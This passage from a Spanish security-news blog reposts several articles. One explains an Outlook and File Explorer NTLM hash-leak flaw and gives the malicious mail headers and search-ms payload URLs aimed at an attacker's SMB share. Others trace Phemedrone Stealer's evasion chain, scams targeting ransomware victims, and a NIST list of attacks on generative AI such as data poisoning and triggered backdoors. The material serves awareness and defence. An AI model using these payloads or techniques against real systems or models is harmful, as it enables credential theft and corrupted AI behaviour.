lunes, 22 de enero de 2024

Cómo robar la contraseña de Windows a través del correo de Outlook

Varonis Threat Labs ha descubierto una vulnerabilidad importante en Microsoft Outlook ( CVE-2023-35636 ) que permite a los atacantes acceder a contraseñas hash NTLM v2. Este descubrimiento también incluye vulnerabilidades en el Analizador de rendimiento de Windows (WPA) y el Explorador de archivos de Windows, lo que plantea graves riesgos de seguridad.

¿QUÉ ES CVE-2023-35636?

CVE-2023-35636 es un exploit dirigido a la función de compartir calendario en Microsoft Outlook. Al agregar dos encabezados específicos a un correo electrónico, los atacantes pueden indicarle a Outlook que comparta contenido y se comunique con una máquina designada, interceptando así un hash NTLM v2.

ENTENDIENDO NTLM V2

NTLM v2 es un protocolo criptográfico utilizado por Microsoft Windows para autenticar usuarios en servidores remotos. A pesar de ser más seguro que su predecesor, NTLM v2 sigue siendo vulnerable a ataques de retransmisión de autenticación y de fuerza bruta fuera de línea. El protocolo implica transportar contraseñas como hashes que, sin sal, son equivalentes a contraseñas.

EXPLOTACIÓN DE HASHES NTLM V2

Los atacantes pueden utilizar hashes NTLM v2 de dos formas principales:

  1. Ataques de fuerza bruta sin conexión: aquí, los atacantes acceden a una copia del hash NTLM v2 y generan todas las contraseñas posibles para encontrar una coincidencia.
  2. Ataques de retransmisión de autenticación: esto implica interceptar una solicitud de autenticación NTLM v2 y reenviarla a un servidor diferente.

FILTRACIÓN DE HASHES NTLM V2 MEDIANTE OUTLOOK

La vulnerabilidad de Outlook radica en su función para compartir calendario. Al crear un correo electrónico con encabezados específicos, los atacantes pueden redirigir la contraseña hash a su máquina.

EL EXPLOIT DE OUTLOOK:
  1. “Content-Class” = “Compartir” : indica que el correo electrónico contiene contenido para compartir.
  2. “x-sharing-config-url” = \\(Máquina atacante)\a.ics : dirige Outlook de la víctima a la máquina del atacante.

FILTRACIÓN DE HASHES NTLM V2 MEDIANTE CONTROLADORES DE URI Y WPA

Los controladores de URI en los sistemas operativos permiten que las aplicaciones se registren para tipos de URI específicos. El Analizador de rendimiento de Windows (WPA) utiliza un controlador de URI “WPA://” de forma predeterminada. Los atacantes pueden aprovechar esto para autenticarse utilizando NTLM v2 en la web abierta.

EL EXPLOIT WPA

El exploit implica una carga útil simple que dirige la máquina de la víctima a acceder a la máquina del atacante a través de SMB, lo que potencialmente filtra el hash NTLM v2.

ESCENARIO DE ATAQUE

PASO 1: ELABORACIÓN DEL CORREO ELECTRÓNICO MALICIOSO

  1. Preparación del atacante: el atacante prepara un correo electrónico con dos encabezados específicos:
    • "Content-Class" = "Sharing": este encabezado le indica a Outlook que el correo electrónico contiene contenido para compartir.
    • "x-sharing-config-url" = \\[Attacker's Machine]\a.ics: este encabezado dirige el Outlook de la víctima a un archivo ( a.ics) alojado en la máquina del atacante.

PASO 2: LA VÍCTIMA RECIBE EL CORREO ELECTRÓNICO

  1. Acción de la víctima: La víctima recibe el correo electrónico e interactúa con él (por ejemplo, hace clic en un enlace o botón en el correo electrónico que dice “Abrir este iCal”).
  2. Respuesta de Outlook: debido a los encabezados del correo electrónico, Outlook intenta recuperar el a.icsarchivo de la máquina del atacante.

PASO 3: INTERCEPTAR EL HASH NTLM V2

  1. Transmisión de hash: cuando Outlook intenta acceder al archivo en la máquina del atacante, envía un hash NTLM v2 de la contraseña del usuario para autenticación.
  2. Intercepción del atacante: el atacante captura este hash.

PASO 4: EXPLOTAR EL HASH

  1. Ataque de fuerza bruta sin conexión: el atacante utiliza el hash capturado para realizar un ataque de fuerza bruta sin conexión. Esto implica probar varias combinaciones de contraseñas con el hash hasta encontrar una coincidencia.
  2. Obtención de acceso no autorizado: una vez que se determina la contraseña correcta, el atacante puede usarla para acceder a la cuenta o al sistema de la víctima.

EJEMPLO

Imagine un escenario en el que Alice, una empleada de una corporación, recibe un correo electrónico que parece ser una invitación del calendario de un colega. El correo electrónico contiene un botón que dice “Abrir este iCal”. Sin que Alice lo sepa, el correo electrónico en realidad proviene de un atacante y está diseñado para explotar CVE-2023-35636.

Cuando Alice hace clic en el botón, Outlook intenta recuperar el a.icsarchivo de lo que cree que es la máquina de su colega, pero en realidad es el servidor del atacante. Durante este proceso, su computadora envía un hash NTLM v2 de su contraseña al servidor del atacante para su autenticación.

El atacante, ahora en posesión del hash NTLM v2 de Alice, utiliza una potente computadora para realizar un ataque de fuerza bruta fuera de línea. Finalmente, el atacante descubre la contraseña real de Alice y obtiene acceso no autorizado a su cuenta corporativa, lo que podría provocar el robo de datos o un mayor compromiso de la red.

FILTRACIÓN DE HASHES NTLM V2 MEDIANTE EL EXPLORADOR DE ARCHIVOS DE WINDOWS

Cómo se puede ejecutar un ataque similar a la vulnerabilidad de Outlook utilizando el Explorador de archivos de Windows. Esto implica explotar los parámetros “subconsulta” y “crumb” en el controlador de URI “search-ms” del Explorador de archivos de Windows.

ANTECEDENTES: EXPLORADOR DE ARCHIVOS DE WINDOWS Y CONTROLADORES DE URI

El Explorador de archivos de Windows, conocido como explorer.exe, es una aplicación de administración de archivos en Windows. Incluye una función llamada controladores de URI, que le permite procesar tipos especiales de enlaces ( search-ms://) que pueden desencadenar acciones específicas dentro del Explorador de archivos.

ESCENARIO DE ATAQUE UTILIZANDO EL EXPLORADOR DE ARCHIVOS DE WINDOWS

PASO 1: ELABORACIÓN DEL VÍNCULO MALICIOSO

  1. Preparación del atacante: el atacante crea un enlace malicioso utilizando el search-msesquema URI. Este enlace incluye parámetros especiales que dirigirán el Explorador de archivos de la víctima a la máquina del atacante. Hay dos métodos para hacer esto:
    • Usando el parámetro “subconsulta”: search-ms://query=poc&subquery=\\[Attacker's Machine]\poc.search-ms
    • Usando el parámetro “miga”: search-ms://query=poc&crumb=location:\\[Attacker's Machine]

PASO 2: ENTREGAR EL ENLACE MALICIOSO

  1. Distribución: el atacante envía este enlace a la víctima por correo electrónico, redes sociales u otros medios. El enlace puede disfrazarse de una consulta de búsqueda legítima o una solicitud de archivo.

PASO 3: LA VÍCTIMA INTERACTÚA CON EL ENLACE

  1. Acción de la víctima: La víctima hace clic en el enlace creyendo que es legítimo.
  2. Respuesta del Explorador de archivos: El Explorador de archivos de la víctima intenta ejecutar la búsqueda o acceder al archivo especificado en el enlace, que apunta a la máquina del atacante.

PASO 4: INTERCEPTAR EL HASH NTLM V2

  1. Transmisión de hash: para acceder al recurso en la máquina del atacante, el sistema de la víctima envía un hash NTLM v2 de la contraseña del usuario para autenticación.
  2. Intercepción del atacante: el atacante captura este hash de su máquina.

PASO 5: EXPLOTAR EL HASH

  1. Ataque de fuerza bruta sin conexión: el atacante utiliza el hash capturado para realizar un ataque de fuerza bruta sin conexión, intentando encontrar la contraseña real.
  2. Obtención de acceso no autorizado: si tiene éxito, el atacante puede usar la contraseña para obtener acceso no autorizado al sistema o red de la víctima.

EJEMPLO

Considere un escenario en el que Bob, un usuario, recibe un correo electrónico con un enlace que parece dirigirlo a una búsqueda de archivos útil en la red de su empresa. El enlace es en realidad una search-msURL maliciosa creada por un atacante. Cuando Bob hace clic en el enlace, su Explorador de archivos intenta ejecutar la búsqueda, que sin saberlo apunta al servidor del atacante.

Cuando File Explorer intenta acceder al recurso, envía un hash NTLM v2 de la contraseña de Bob para autenticación. El atacante captura este hash y luego utiliza varias herramientas para descifrar la contraseña sin conexión. Una vez obtenida la contraseña, el atacante puede potencialmente acceder a la computadora de Bob u otros recursos dentro de la red de la empresa.

Este escenario de ataque demuestra la vulnerabilidad potencial dentro del Explorador de archivos de Windows al manejar search-msURL especialmente diseñadas. Destaca la importancia de ser cauteloso con los enlaces, incluso aquellos que parecen ser archivos internos o solicitudes de búsqueda, y la necesidad de medidas de seguridad sólidas para protegerse contra tales ataques de robo de hash NTLM. Varonis Threat Labs también descubrió vulnerabilidades en el proceso del Explorador de archivos de Windows, explorer.exe , particularmente en los parámetros “subconsulta” y “crumb” del controlador URI “search-ms”.

LAS VULNERABILIDADES DEL EXPLORADOR DE ARCHIVOS DE WINDOWS

  1. Uso del parámetro “subconsulta”: este método indica a explorer.exe que se conecte a un SMB remoto, filtrando el hash NTLM v2.
  2. Uso del parámetro “crumb”: similar al exploit “subconsulta”, este método también conduce al robo de la contraseña hash.

LA RESPUESTA DE MICROSOFT

Microsoft reconoció el exploit de Outlook como un CVE-2023-35636 importante y lanzó un parche el 12 de diciembre de 2023. Las vulnerabilidades para WPA y el Explorador de archivos de Windows se cerraron debido a su “gravedad moderada”.

PROTECCIÓN CONTRA ATAQUES NTLM V2

Para protegerse contra estas vulnerabilidades, se recomienda:

  • Habilite la firma SMB.
  • Bloquee NTLM v2 saliente, especialmente en Windows 11 (25951) y versiones posteriores.
  • Prefiera la autenticación Kerberos y bloquee NTLM v2 en los niveles de red y aplicación.

Los sistemas sin parches siguen en riesgo y es fundamental actualizarlos y aplicar medidas de seguridad para evitar posibles ataques.

El cargo Cómo robar la contraseña de Windows a través del correo de Outlook apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

lunes, 15 de enero de 2024

Explotar el antivirus de Windows Defender para infectar un dispositivo con malware

Los recientes esfuerzos de búsqueda de amenazas de Trend Micro han descubierto una explotación activa de CVE-2023-36025, una vulnerabilidad en Microsoft Windows Defender SmartScreen, por parte de una nueva cepa de malware conocida como Phemedrone Stealer. Este malware se dirige a navegadores web, carteras de criptomonedas y aplicaciones de mensajería como Telegram, Steam y Discord, robando datos y enviándolos a atacantes a través de Telegram o servidores de comando y control. Phemedrone Stealer, un ladrón de código abierto escrito en C#, se mantiene activamente en GitHub y Telegram.

CVE-2023-36025 surge de controles insuficientes en los archivos de acceso directo a Internet (.url), lo que permite a los atacantes eludir las advertencias de Windows Defender SmartScreen mediante el uso de archivos .url manipulados que descargan y ejecutan scripts maliciosos. Microsoft parchó esta vulnerabilidad el 14 de noviembre de 2023, pero su explotación en la naturaleza llevó a su inclusión en la lista de vulnerabilidades explotadas conocidas de la Agencia de Seguridad de Infraestructura y Ciberseguridad. Desde entonces, varias campañas de malware, incluidas las que distribuyen Phemedrone Stealer, han incorporado esta vulnerabilidad.

ACCESO INICIAL A TRAVÉS DE URL MALICIOSAS ALOJADAS EN LA NUBE

Según el informe , esto implica aprovechar las URL alojadas en la nube que son de naturaleza maliciosa. El artículo proporciona información sobre cómo se utilizan estas URL para iniciar el ataque, destacando las estrategias empleadas para distribuir el malware y penetrar en los sistemas de destino. Los atacantes alojan archivos maliciosos de accesos directos a Internet en plataformas como Discord o servicios en la nube, a menudo disfrazados con acortadores de URL. Los usuarios desprevenidos que abren estos archivos desencadenan la explotación de CVE-2023-36025.

TÁCTICAS DE EVASIÓN DE DEFENSA

El archivo .url malicioso descarga y ejecuta un archivo de elemento del panel de control (.cpl) desde un servidor controlado por un atacante. Esto omite el mensaje de seguridad habitual de Windows Defender SmartScreen. El malware emplea la técnica MITRE ATT&CK T1218.002, utilizando el proceso binario del Panel de control de Windows para ejecutar archivos .cpl, que son esencialmente archivos DLL.

  1. Infección inicial a través de un archivo .url malicioso (CVE-2023-36025): el ataque comienza cuando un usuario ejecuta un archivo malicioso de acceso directo a Internet (.url). Este archivo está diseñado para omitir las advertencias de SmartScreen de Microsoft Windows Defender, que generalmente se activan para archivos de fuentes que no son de confianza. Es probable que la evasión se logre manipulando la estructura o el contenido del archivo, haciéndolo parecer benigno.
  2. Ejecución de un archivo de elemento del panel de control (.cpl): una vez ejecutado, el archivo .url se conecta a un servidor controlado por un atacante para descargar un archivo .cpl. En Windows, los archivos .cpl se utilizan para ejecutar elementos del Panel de control y son esencialmente bibliotecas de vínculos dinámicos (DLL). Este paso implica la técnica MITRE ATT&CK T1218.002, que explota el proceso binario del Panel de control de Windows ( control.exe) para ejecutar archivos .cpl.
  3. Uso de rundll32.exe para la ejecución de DLL: el archivo .cpl, cuando se ejecuta a través de control.exe, llama a rundll32.exe, una utilidad legítima de Windows utilizada para ejecutar funciones almacenadas en archivos DLL. Este paso es fundamental ya que utiliza un proceso confiable de Windows para ejecutar la DLL maliciosa, evadiendo aún más la detección.
  4. Utilización de PowerShell para descarga y ejecución de carga útil: la DLL maliciosa actúa como un cargador para llamar a Windows PowerShell, un marco de automatización de tareas. Luego se utiliza PowerShell para descargar y ejecutar la siguiente etapa del ataque desde GitHub.
  5. Ejecución de DATA3.txt PowerShell Loader: El archivo DATA3.txt, alojado en GitHub, es un script de PowerShell ofuscado diseñado para ser difícil de analizar estáticamente (es decir, sin ejecutarlo). Utiliza manipulación de cadenas y dígitos para enmascarar su verdadera intención.
  6. Desofuscación y ejecución del cargador alojado en GitHub: mediante una combinación de análisis estático y dinámico, los comandos de PowerShell ofuscados que contiene DATA3.txtse pueden desofuscar. Este script se encarga de descargar un archivo ZIP desde el mismo repositorio de GitHub.
  7. Contenido del archivo ZIP descargado:
    • WerFaultSecure.exe: un binario legítimo de informe de fallos de Windows.
    • Wer.dll: un binario malicioso que se descarga (se ejecuta en el contexto de un proceso legítimo) cuando WerFaultSecure.exese ejecuta.
    • Secure.pdf: un cargador de segunda etapa cifrado con RC4, que presumiblemente contiene más código malicioso.

Este ataque es sofisticado, utiliza múltiples capas de evasión y aprovecha procesos y archivos binarios legítimos de Windows para ocultar actividades maliciosas. El uso de GitHub como plataforma de alojamiento para cargas maliciosas también es digno de mención, ya que puede dar una apariencia de legitimidad y puede eludir algunos controles de seguridad basados ​​en la red.

PERSISTENCIA Y CARGA LATERAL DE DLL

El malware logra persistencia mediante la creación de tareas programadas y utiliza técnicas de descarga de DLL. La DLL maliciosa, crucial para la funcionalidad del cargador, descifra y ejecuta el cargador de segunda etapa. Utiliza resolución API dinámica y algoritmos basados ​​en XOR para descifrar cadenas, lo que complica los esfuerzos de ingeniería inversa.

  1. Funcionalidad de DLL malicioso (wer.dll) : descifra y ejecuta un cargador de segunda etapa. Para evitar la detección y obstaculizar la ingeniería inversa, emplea hash API, cifrado de cadenas y está protegido por VMProtect.
  2. Técnica de carga lateral de DLL : el malware engaña al sistema para que cargue el wer.dll malicioso colocándolo en el directorio de la aplicación, un método que explota la confianza que Windows tiene en sus propios directorios.
  3. Resolución dinámica de API : para evitar la detección mediante herramientas de análisis estático, el malware utiliza hash CRC-32 para almacenar nombres de API, importándolos dinámicamente durante el tiempo de ejecución.
  4. Descifrado de cadenas basado en XOR : se utiliza un algoritmo para descifrar cadenas, y la clave de cada byte se genera en función de su posición. Este método está diseñado para complicar los esfuerzos de descifrado automatizado.
  5. Mecanismo de persistencia : el malware crea una tarea programada para ejecutar periódicamente WerFaultSecure.exe. Esto asegura que el malware permanezca activo en el sistema infectado.
  6. Cargador de segunda etapa (secure.pdf) : se descifra utilizando una función no documentada de advapi32.dll, con la asignación y modificación de memoria manejadas por funciones de Activeds.dll y VirtualProtect.
  7. Redirección de ejecución a través de devoluciones de llamadas API : el malware redirige inteligentemente el flujo de ejecución a la carga útil de la segunda etapa utilizando funciones de devolución de llamadas API de Windows, explotando particularmente la función CryptCATCDFOpen.

En general, este malware demuestra un profundo conocimiento de las partes internas de Windows, utilizándolas a su favor para permanecer oculto y mantener la persistencia en el sistema infectado. La combinación de técnicas utilizadas la convierte en una amenaza compleja y peligrosa.

EVASIÓN DE DEFENSA DE SEGUNDA ETAPA

El cargador de segunda etapa, conocido como Donut, es un código shell de código abierto que ejecuta varios tipos de archivos en la memoria. Cifra cargas útiles sin compresión y utiliza la API de alojamiento CLR no administrada para cargar Common Language Runtime, creando un nuevo dominio de aplicación para ejecutar ensamblados. A continuación se ofrece una descripción general de cómo se utiliza Donut para la evasión de defensa y la ejecución de cargas útiles:

  1. Cargador de código Shell de donut :
    • Capacidades : permite la ejecución de archivos VBScript, JScript, EXE, archivos DLL y ensamblados .NET directamente en la memoria.
    • Opciones de implementación : se pueden integrar en el cargador o organizar desde un servidor HTTP o DNS. En este caso, está integrado directamente en el cargador.
  2. Compresión y cifrado de carga útil :
    • Técnicas de compresión : admite aPLib, LZNT1, Xpress y Xpress Huffman a través de RtlCompressBuffer.
    • Cifrado : utiliza el cifrado de bloques Chaskey para el cifrado de carga útil. En este caso, sólo se utiliza cifrado, sin compresión.
  3. Proceso de ejecución a través de API de alojamiento CLR no administrada :
    • Carga de CLR : Donut se configura para usar la API de alojamiento CLR no administrada para cargar Common Language Runtime (CLR) en el proceso del host.
    • Creación de dominio de aplicación : crea un nuevo dominio de aplicación, lo que permite que los ensamblados se ejecuten en dominios de aplicación desechables.
    • Carga y ejecución de ensamblados : una vez que el AppDomain está preparado, Donut carga el ensamblado .NET e invoca el punto de entrada de la carga útil.

El uso de Donut en este ataque es particularmente notable por su capacidad de ejecutar varios tipos de código directamente en la memoria. Este método reduce en gran medida la visibilidad del ataque respecto de las medidas de seguridad tradicionales, ya que deja rastros mínimos en el sistema de archivos. Además, el uso de tácticas de ejecución de sólo memoria, junto con un cifrado sofisticado, hace que la carga útil sea difícil de detectar y analizar. La capacidad de crear y utilizar AppDomains desechables mejora aún más la evasión al aislar el entorno de ejecución, lo que reduce las posibilidades de detección por parte de las herramientas de monitoreo en tiempo de ejecución. Este enfoque demuestra un alto nivel de sofisticación a la hora de evadir defensas y ejecutar sigilosamente la carga útil final.

ANÁLISIS DE CARGA ÚTIL DEL LADRÓN DE PHEMEDRONE

Phemedrone Stealer inicializa su configuración y descifra elementos como tokens API de Telegram utilizando el algoritmo de cifrado simétrico RijndaelManaged. Se dirige a una amplia gama de aplicaciones para extraer información confidencial, incluidos navegadores basados ​​en Chromium, billeteras criptográficas, Discord, FileGrabber, FileZilla, navegadores basados ​​en Gecko, información del sistema, Steam y Telegram.

COMANDO Y CONTROL PARA LA FILTRACIÓN DE DATOS

Después de la recopilación de datos, el malware comprime la información en un archivo ZIP y valida el token API de Telegram antes de filtrar los datos. Envía información y estadísticas del sistema al atacante a través de la API de Telegram. A pesar del parche para CVE-2023-36025, los actores de amenazas continúan explotando esta vulnerabilidad para evadir la protección SmartScreen de Windows Defender. La campaña Phemedrone Stealer destaca la necesidad de vigilancia y medidas de seguridad actualizadas contra estas ciberamenazas en evolución.

MITIGACIÓN

Mitigar los riesgos asociados con CVE-2023-36025 y vulnerabilidades similares, especialmente en el contexto de la campaña Phemedrone Stealer, implica un enfoque de múltiples capas. Aquí hay algunas estrategias clave:

  1. Aplique parches de seguridad: asegúrese de que todos los sistemas estén actualizados con los últimos parches de seguridad de Microsoft, en particular el que aborda CVE-2023-36025. La actualización periódica del software puede evitar que los atacantes aprovechen las vulnerabilidades conocidas.
  2. Mejore la protección de endpoints: utilice soluciones avanzadas de protección de endpoints que puedan detectar y bloquear malware sofisticado como Phemedrone Stealer. Estas soluciones deberían incluir detección basada en el comportamiento para identificar actividades maliciosas.
  3. Educar a los usuarios: llevar a cabo capacitaciones sobre concientización sobre seguridad para todos los usuarios. Infórmeles sobre los peligros de hacer clic en enlaces desconocidos, abrir archivos adjuntos de correo electrónico sospechosos y los riesgos de descargar archivos de fuentes no confiables.
  4. Implementar medidas de seguridad de la red: utilice firewalls, sistemas de detección de intrusiones y sistemas de prevención de intrusiones para monitorear y controlar el tráfico de la red según un conjunto de reglas de seguridad aplicadas.
  5. Puertas de enlace de correo electrónico seguras: implemente soluciones de seguridad de correo electrónico que puedan escanear y filtrar correos electrónicos maliciosos, que a menudo son el punto de partida de infecciones de malware.
  6. Copias de seguridad periódicas: realice copias de seguridad de los datos periódicamente y asegúrese de que las copias de seguridad se almacenen de forma segura. En caso de infección de malware, tener copias de seguridad actualizadas puede evitar la pérdida de datos.
  7. Utilice la lista blanca de aplicaciones: controle qué aplicaciones pueden ejecutarse en su red. Esto puede evitar que se ejecuten aplicaciones no autorizadas, incluido el malware.
  8. Supervise y analice registros: revise periódicamente los registros del sistema y de las aplicaciones en busca de actividades inusuales que puedan indicar una infracción o un intento de explotar vulnerabilidades.
  9. Restringir los privilegios del usuario: aplique el principio de privilegio mínimo limitando los derechos de acceso de los usuarios solo a aquellos necesarios para sus funciones laborales. Esto puede reducir el impacto de un ataque exitoso.
  10. Plan de respuesta a incidentes: disponga de un plan de respuesta a incidentes bien definido. Esto debería incluir procedimientos para responder a una violación de la seguridad y mitigar su impacto.
  11. Utilice puertas de enlace web seguras: implemente puertas de enlace web que puedan detectar y bloquear el acceso a sitios web maliciosos, evitando así la descarga de contenido dañino.
  12. Auditorías de seguridad periódicas: realice auditorías de seguridad periódicas y evaluaciones de vulnerabilidad para identificar y abordar posibles brechas de seguridad en la red.

Al implementar estas medidas, las organizaciones pueden reducir significativamente el riesgo de ser víctimas de campañas de malware que explotan vulnerabilidades como CVE-2023-36025.

El cargo Explotar el antivirus de Windows Defender para infectar un dispositivo con malware apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

miércoles, 10 de enero de 2024

Dentro de la estafa: ¡Cómo las bandas de ransomware te engañan con mentiras sobre la eliminación de datos!

Recientemente, ha surgido una nueva estafa dirigida a víctimas de ataques de ransomware . Esta estafa involucra a individuos o grupos que se hacen pasar por “investigadores de seguridad” o “hackers éticos” y ofrecen eliminar datos robados por atacantes de ransomware a cambio de una tarifa. La estafa aprovecha los miedos y las vulnerabilidades de las organizaciones que ya se han visto comprometidas por ataques de ransomware, como los de las bandas de ransomware Royal y Akira.

El modus operandi de estos estafadores es bastante consistente y alarmante. Se acercan a organizaciones que ya han sido víctimas de ransomware y ofrecen un servicio para piratear los servidores de los grupos de ransomware y eliminar los datos robados. Esta propuesta generalmente viene con una tarifa significativa, a veces en el rango de 1 a 5 Bitcoins (que podría ascender a alrededor de $190,000 a $220,000).

Estos estafadores suelen utilizar plataformas como Tox Chat para comunicarse con sus objetivos y pueden utilizar nombres como “Ethical Side Group” o apodos como “xanonymoux”. Suelen proporcionar “pruebas” de acceso a los datos robados, que, según afirman, todavía se encuentran en los servidores del atacante. En algunos casos, informan con precisión la cantidad de datos extraídos, lo que da a sus afirmaciones un aire de credibilidad.

Un aspecto notable de esta estafa es que añade una capa adicional de extorsión a las víctimas del ransomware. Estas víctimas no solo tienen que lidiar con el ataque inicial de ransomware y los costos asociados, sino que también enfrentan la perspectiva de pagar a otra parte para garantizar la seguridad de sus datos. Esta situación pone de relieve las complejidades y la naturaleza cambiante de las ciberamenazas, particularmente en el contexto del ransomware.

Expertos e investigadores en seguridad, como los de Arctic Wolf, han observado e informado sobre estos incidentes, notando las similitudes en las tácticas y estilos de comunicación utilizados por los estafadores en diferentes casos. Sin embargo, sigue habiendo mucha incertidumbre sobre la capacidad real de estos estafadores para eliminar los datos robados y sus verdaderas intenciones.

LA ESTAFA EMERGENTE EN LOS ATAQUES DE RANSOMWARE

1. LA FALSA PROMESA DE LA ELIMINACIÓN DE DATOS

  • Se sabe que las bandas de ransomware no siempre eliminan los datos robados, incluso después de recibir el pago. A menudo se engaña a las víctimas haciéndoles creer que pagar el rescate dará lugar a la eliminación de sus datos robados. Sin embargo, ha habido numerosos casos en los que este no ha sido el caso, lo que ha llevado a una mayor explotación.

2. ESTAFAS FALSAS DE ‘INVESTIGADORES DE SEGURIDAD’

  • Una nueva estafa involucra a personas que se hacen pasar por investigadores de seguridad y ofrecen servicios para recuperar o eliminar datos exfiltrados a cambio de una tarifa. Estos estafadores se dirigen a las víctimas de ransomware y, a menudo, exigen el pago en Bitcoin. Esta táctica añade otra capa de engaño y pérdida financiera para las víctimas.

3. LAS OFERTAS DE HACK-BACK

  • Las víctimas de ransomware ahora son objeto de ofertas falsas de piratería. Estas ofertas prometen eliminar los datos de las víctimas robadas, pero son esencialmente estafas diseñadas para extorsionar a las víctimas con más dinero. Esta tendencia pone de relieve la naturaleza cambiante de las amenazas cibernéticas y la necesidad de una mayor conciencia.

4. LA NATURALEZA ILÓGICA DE PAGAR POR LA ELIMINACIÓN DE DATOS

  • Pagar para eliminar datos robados se considera una estrategia ilógica e ineficaz. Una vez que se roban los datos, no hay garantía de que los ciberdelincuentes cumplan su palabra. El artículo sostiene que pagar el rescate a menudo produce más daños que beneficios.

5. EL PAPEL DE LOS GRUPOS DE RANSOMWARE

  • Algunos grupos de ransomware participan en la oferta de servicios para eliminar datos exfiltrados a cambio de una tarifa. Sin embargo, estas ofertas suelen ser estafas y no hay garantía de que los datos se eliminen después del pago.

Estas estafas subrayan la importancia crítica de la vigilancia de la ciberseguridad y la necesidad de medidas de seguridad sólidas para proteger contra el ransomware y las ciberamenazas relacionadas. También destaca el desafiante proceso de toma de decisiones para las organizaciones que son víctimas del ransomware: si pagar el rescate, cómo manejar los datos robados y cómo responder a intentos de extorsión posteriores.

El cargo Dentro de la estafa: ¡Cómo las bandas de ransomware te engañan con mentiras sobre la eliminación de datos! apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

lunes, 8 de enero de 2024

11 formas de hackear ChatGpt y sistemas de IA generativa

En el panorama de la inteligencia artificial en rápida evolución, los sistemas de IA generativa se han convertido en una piedra angular de la innovación, impulsando avances en campos que van desde el procesamiento del lenguaje hasta la generación de contenido creativo. Sin embargo, un informe reciente del Instituto Nacional de Estándares y Tecnología (NIST) arroja luz sobre la creciente vulnerabilidad de estos sistemas a una variedad de ciberataques sofisticados. El informe proporciona una taxonomía completa de los ataques dirigidos a sistemas de IA generativa (GenAI), y revela las formas intrincadas en las que se pueden explotar estas tecnologías. Los hallazgos son particularmente relevantes a medida que la IA continúa integrándose más profundamente en varios sectores, lo que genera preocupaciones sobre las implicaciones de integridad y privacidad de estos sistemas.

ATAQUES A LA INTEGRIDAD: UNA AMENAZA AL NÚCLEO DE LA IA

Los ataques a la integridad que afectan a los sistemas de IA generativa son un tipo de amenaza a la seguridad cuyo objetivo es manipular o corromper el funcionamiento del sistema de IA. Estos ataques pueden tener implicaciones importantes, especialmente porque los sistemas de IA generativa se utilizan cada vez más en diversos campos. A continuación se muestran algunos aspectos clave de los ataques a la integridad de los sistemas de IA generativa:

  1. Envenenamiento de datos :
    • Detalle: este ataque tiene como objetivo la fase de entrenamiento de un modelo de IA. Los atacantes inyectan datos falsos o engañosos en el conjunto de entrenamiento, lo que puede alterar sutil o significativamente el aprendizaje del modelo. Esto puede dar como resultado un modelo que genere resultados sesgados o incorrectos.
    • Ejemplo: considere un sistema de reconocimiento facial que se entrena con un conjunto de datos que ha sido envenenado con imágenes sutilmente alteradas. Estas imágenes pueden contener pequeños cambios imperceptibles que hacen que el sistema reconozca incorrectamente ciertas caras u objetos.
  2. Manipulación del modelo :
    • Detalle: En este ataque se alteran los parámetros internos o la arquitectura del modelo de IA. Esto podría hacerlo una persona interna con acceso al modelo o explotando una vulnerabilidad en el sistema.
    • Ejemplo: un atacante podría alterar las ponderaciones en un modelo de análisis de sentimientos, haciendo que interprete los sentimientos negativos como positivos, lo que podría ser particularmente dañino en contextos como el análisis de comentarios de los clientes.
  3. Manipulación de salida :
    • Detalle: esto ocurre en el posprocesamiento, donde la salida de la IA se intercepta y modifica antes de que llegue al usuario final. Esto se puede hacer sin alterar directamente el modelo de IA.
    • Ejemplo: si se utiliza un sistema de IA generativa para generar informes financieros, un atacante podría interceptar y manipular el resultado para mostrar una salud financiera incorrecta, lo que afectaría los precios de las acciones o las decisiones de los inversores.
  4. Ataques adversarios :
    • Detalle: Estos ataques utilizan entradas que están diseñadas específicamente para confundir el modelo de IA. Estas entradas a menudo son indistinguibles de las entradas normales del ojo humano, pero provocan que la IA cometa errores.
    • Ejemplo: una señal de alto con pegatinas o grafitis sutiles podría ser reconocida como una señal de límite de velocidad por el sistema de inteligencia artificial de un vehículo autónomo, lo que daría lugar a posibles infracciones de tráfico o accidentes.
  5. Ataques de puerta trasera :
    • Detalle: Se integra una puerta trasera en el modelo de IA durante su entrenamiento. Esta puerta trasera se activa mediante determinadas entradas, lo que hace que el modelo se comporte de forma inesperada o maliciosa.
    • Ejemplo: un modelo de traducción de idiomas podría tener una puerta trasera que, cuando se activa con una frase específica, comienza a insertar o alterar palabras en una traducción, lo que potencialmente cambia el significado del mensaje.
  6. Explotación de prejuicios :
    • Detalle: este ataque aprovecha los sesgos existentes dentro del modelo de IA. Los sistemas de IA pueden heredar sesgos de sus datos de entrenamiento, y estos sesgos pueden explotarse para producir resultados sesgados o dañinos.
    • Ejemplo: si un modelo de IA utilizado para la selección de currículums tiene un sesgo de género inherente, los atacantes pueden enviar currículums diseñados para explotar este sesgo, lo que aumenta la probabilidad de que ciertos candidatos sean seleccionados o rechazados injustamente.
  7. Ataques de evasión :
    • Detalle: en este escenario, los datos de entrada se manipulan de tal manera que el sistema de inteligencia artificial no logra reconocerlos como algo para lo que está entrenado para detectar o categorizar correctamente.
    • Ejemplo: El malware podría diseñarse para evadir la detección de un sistema de seguridad basado en IA alterando ligeramente la firma de su código, haciéndolo parecer benigno para el sistema y al mismo tiempo llevando a cabo funciones maliciosas.


ATAQUES A LA PRIVACIDAD DE LA IA GENERATIVA

Los ataques a la privacidad de los sistemas de IA generativa son una preocupación seria, especialmente dado el uso cada vez mayor de estos sistemas en el manejo de datos confidenciales. Estos ataques tienen como objetivo comprometer la confidencialidad y privacidad de los datos utilizados o generados a partir de estos sistemas. A continuación se muestran algunos tipos comunes de ataques a la privacidad, explicados en detalle con ejemplos:

  1. Ataques de inversión de modelos :
    • Detalle : en este tipo de ataque, el atacante intenta reconstruir los datos de entrada a partir de la salida del modelo. Esto es particularmente preocupante si el modelo de IA genera algo que indirectamente revela información confidencial sobre los datos de entrada.
    • Ejemplo : considere un sistema de reconocimiento facial que genera la probabilidad de ciertos atributos (como la edad o el origen étnico). Un atacante podría utilizar esta información de salida para reconstruir los rostros de las personas en los datos de entrenamiento, invadiendo así su privacidad.
  2. Ataques de inferencia de membresía :
    • Detalle : estos ataques tienen como objetivo determinar si un registro de datos en particular se utilizó en el conjunto de datos de entrenamiento de un modelo de aprendizaje automático. Esto puede representar un problema de privacidad si los datos de capacitación contienen información confidencial.
